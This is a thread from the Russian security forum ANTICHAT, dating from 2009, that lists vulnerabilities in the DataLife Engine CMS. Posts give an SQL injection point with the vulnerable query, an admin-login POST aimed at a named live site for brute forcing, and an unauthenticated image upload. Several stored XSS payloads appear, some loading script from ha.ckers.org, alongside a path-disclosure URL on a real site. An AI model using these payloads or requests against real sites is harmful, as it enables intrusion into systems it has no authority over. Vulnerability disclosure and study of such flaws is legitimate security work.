HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 01.03.2009, 22:09
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


По умолчанию

Удаление комментариев при помощи AJAX
Версия: v.1.0


sql-inj

Уязвимый скрипт: engine/ajax/commentdelete.php
Запрос: commid=-1'
Метод: GET
Уязвимый кусок кода:
PHP код:
$row $db->super_query("SELECT * FROM " PREFIX "_comments where id = '{$_REQUEST['commid']}'"); 
Раскручивать не стал...
 
Ответить с цитированием

брутфорс адмики
  #2  
Старый 03.12.2009, 04:48
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию брутфорс адмики

https://forum.antichat.ru/thread153641.html

бага в посылке пакета без кукисов.
http://vipuzor.com/admin.php
Host: vipuzor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.20) Gecko/20091111 Firefox/3.1.3.37
Referer: http://vipuzor.com/admin.php
Content-Type: application/x-www-form-urlencoded
POST
subaction=dologin&username=admin&password=111111
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #3  
Старый 09.04.2009, 13:13
banana
Участник форума
Регистрация: 04.03.2009
Сообщений: 298
Провел на форуме:
1241030

Репутация: 229
По умолчанию

По адресу site/engine/images.php?area=
Можно заливать картинки на сервер без авторизации

Проверял на 6.7 - пашет

Последний раз редактировалось Jokester; 31.03.2010 в 19:59..
 
Ответить с цитированием

  #4  
Старый 09.05.2009, 17:08
Sosok
Новичок
Регистрация: 16.02.2009
Сообщений: 10
Провел на форуме:
390969

Репутация: 8
По умолчанию

Расскажите можна будет,как нибудь заюзать уязвимость в модуле "Переходы"...?
Когда например в гугле воодишь запрос с ковычкой, то при переходе :
MySQL Error!
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'vBulletin', '/', '%main%', 'ip', 'engine')' at line 1
Error Number:
1064
 
Ответить с цитированием

  #5  
Старый 09.05.2009, 17:15
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


По умолчанию

Цитата:
Сообщение от Sosok  
Расскажите можна будет,как нибудь заюзать уязвимость в модуле "Переходы"...?
Когда например в гугле воодишь запрос с ковычкой, то при переходе :
MySQL Error!
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'vBulletin', '/', '%main%', 'ip', 'engine')' at line 1
Error Number:
1064
покажи подробнее, линком желательно
 
Ответить с цитированием

  #6  
Старый 10.05.2009, 12:18
Sosok
Новичок
Регистрация: 16.02.2009
Сообщений: 10
Провел на форуме:
390969

Репутация: 8
По умолчанию

Вот зайдёшь и на самый первый сайт нажми...
Цитата:
http://www.google.com/search?client=opera&rls=ru&q=site:scriptiks.ru+'

Последний раз редактировалось Sosok; 10.05.2009 в 12:27..
 
Ответить с цитированием

  #7  
Старый 10.05.2009, 12:20
nonamez
Познавший АНТИЧАТ
Регистрация: 22.07.2007
Сообщений: 1,291
Провел на форуме:
3884427

Репутация: 766


По умолчанию

там варка в том, что он сохраняет запросы в базу с реферор от гугла или же яши, а если подделать запрос, то можно вызвать скуль эрор, я уже об этом поднимал тему один раз.
 
Ответить с цитированием

  #8  
Старый 10.05.2009, 13:52
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


По умолчанию

Активные XSS в DLE версии 8.0 (возможно и раньше).
Необходимо несколько специфических настроек.

1) XSS при добавлении новостей из админски, WISYWIG должен быть отключен;
Простое добавление новостей пользователями, WISYWIG должен быть отключен:

Код:
<iframe width=0 border=0 height=0 src=http://ha.ckers.org/scriptlet.html <
Код:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Код:
<SCRIPT SRC=http://ha.ckers.org/xss.js?
<
2) XSS в комментариях к новостям, WISYWIG должен быть включен:
Код:
<SCRIPT SRC=http://ha.ckers.org/xss.js?<

(с) by Wildshaman, 2009 год.
 
Ответить с цитированием

  #9  
Старый 20.05.2009, 11:12
Genry13
Новичок
Регистрация: 19.05.2009
Сообщений: 19
Провел на форуме:
133889

Репутация: 1
По умолчанию

Цитата:
Сообщение от wildshaman  
Код:
 XSS в комментариях к новостям, WISYWIG должен быть включен:
<SCRIPT SRC=http://ha.ckers.org/xss.js?<
Ет коряво и не работает, т.к. к адресу скрипта коннектится "<" и следующий тег, да и полстраницы обрезается... Если в другю сторону загнуть - фильтрует.

З.Ы. Такая же "уязвимость" и в приватных месагах.

Последний раз редактировалось Genry13; 20.05.2009 в 11:15..
 
Ответить с цитированием

  #10  
Старый 11.05.2009, 17:14
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


По умолчанию

DLE 8.0 Раскрытие путей:
Код:
http://dle-news.ru/index.php?do=pm&doaction=del&dle_allow_hash=06e5bbf84191c990867ee5bbacf879b8&master_box=on&selected_pm[][]=8
dle_allow_hash берется из исходника страницы списка персональных сообщений (для каждого юзверя он свой на каждом сайте)...




Активная XSS (требуется доступ в админку)...
идем в редиактирвоание своей инфы в админке ([site]/admin.php?mod=options&action=personal)
, в поле "Полное имя:" пишем
Код:
<script>alert(/Hacked by Wildshaman/)</script>
и смотрим в свой профиль на сайте ([site]/user/username)



(с)Wildshaman 2009 год

Последний раз редактировалось wildshaman; 11.05.2009 в 17:44..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей в платных CMS ZAMUT Веб-уязвимости 90 03.12.2017 01:35
DataLife Engine v.6.5. Null Student :) ПО для Web разработчика 31 23.02.2008 15:36
[ Обзор уязвимостей miniBB ] -=lebed=- Уязвимости CMS / форумов 3 12.01.2008 20:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.